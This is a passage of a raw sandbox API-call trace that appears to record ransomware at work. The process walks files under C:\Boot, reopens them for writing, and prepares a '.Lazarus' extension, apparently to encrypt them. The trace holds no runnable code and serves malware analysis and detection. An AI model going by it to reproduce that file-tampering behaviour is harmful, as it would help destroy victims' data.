Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.573] AreFileApisANSI () returned 1 [0082.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\bg-BG\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\bg-BG\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.574] AreFileApisANSI () returned 1 [0082.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0082.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 30 [0082.574] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.574] GetFileType (hFile=0x334) returned 0x1 [0082.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.574] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.574] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.574] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.575] CloseHandle (hObject=0x334) returned 1 [0082.575] AreFileApisANSI () returned 1 [0082.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0082.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 30 [0082.575] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.575] GetLastError () returned 0x5 [0082.575] GetLastError () returned 0x5 [0082.575] SetLastError (dwErrCode=0x5) [0082.575] GetLastError () returned 0x5 [0082.575] SetLastError (dwErrCode=0x5) [0082.575] GetLastError () returned 0x5 [0082.575] SetLastError (dwErrCode=0x5) [0082.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.575] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⽠\x01⺊Ā")) returned 0 [0082.575] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0082.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0082.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0082.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.576] AreFileApisANSI () returned 1 [0082.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\bootspaces.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\bootspaces.dll", lpUsedDefaultChar=0x0) returned 23 [0082.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.577] AreFileApisANSI () returned 1 [0082.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0082.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2e) returned 0x4e0a0 [0082.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x4e0a0, cchWideChar=23 | out: lpWideCharStr="C:\\Boot\\bootspaces.dll") returned 23 [0082.577] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.578] GetFileType (hFile=0x430) returned 0x1 [0082.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0082.578] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.578] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.578] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.578] CloseHandle (hObject=0x430) returned 1 [0082.578] AreFileApisANSI () returned 1 [0082.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0082.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2e) returned 0x4de00 [0082.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x4de00, cchWideChar=23 | out: lpWideCharStr="C:\\Boot\\bootspaces.dll") returned 23 [0082.579] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.579] GetLastError () returned 0x5 [0082.579] GetLastError () returned 0x5 [0082.579] SetLastError (dwErrCode=0x5) [0082.579] GetLastError () returned 0x5 [0082.579] SetLastError (dwErrCode=0x5) [0082.579] GetLastError () returned 0x5 [0082.579] SetLastError (dwErrCode=0x5) [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.579] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0082.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0082.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0082.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0082.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0082.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.580] AreFileApisANSI () returned 1 [0082.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\BOOTSTAT.DAT", lpUsedDefaultChar=0x0) returned 21 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.580] AreFileApisANSI () returned 1 [0082.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0082.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2a) returned 0x4e340 [0082.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x4e340, cchWideChar=21 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT") returned 21 [0082.581] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.581] GetFileType (hFile=0x430) returned 0x1 [0082.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0082.581] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.581] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.581] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.581] CloseHandle (hObject=0x430) returned 1 [0082.582] AreFileApisANSI () returned 1 [0082.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0082.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2a) returned 0x4e180 [0082.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x4e180, cchWideChar=21 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT") returned 21 [0082.582] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.582] GetFileType (hFile=0x430) returned 0x1 [0082.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0082.582] CloseHandle (hObject=0x430) returned 1 [0082.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.583] AreFileApisANSI () returned 1 [0082.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2a) returned 0x4e260 [0082.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x4e260, cchWideChar=21 | out: lpWideCharStr="C:\\Boot\\BOOTSTAT.DAT") returned 21 [0082.583] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0082.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0082.583] AreFileApisANSI () returned 1 [0082.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.583] GetLastError () returned 0x0 [0082.583] SetLastError (dwErrCode=0x0) [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0082.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 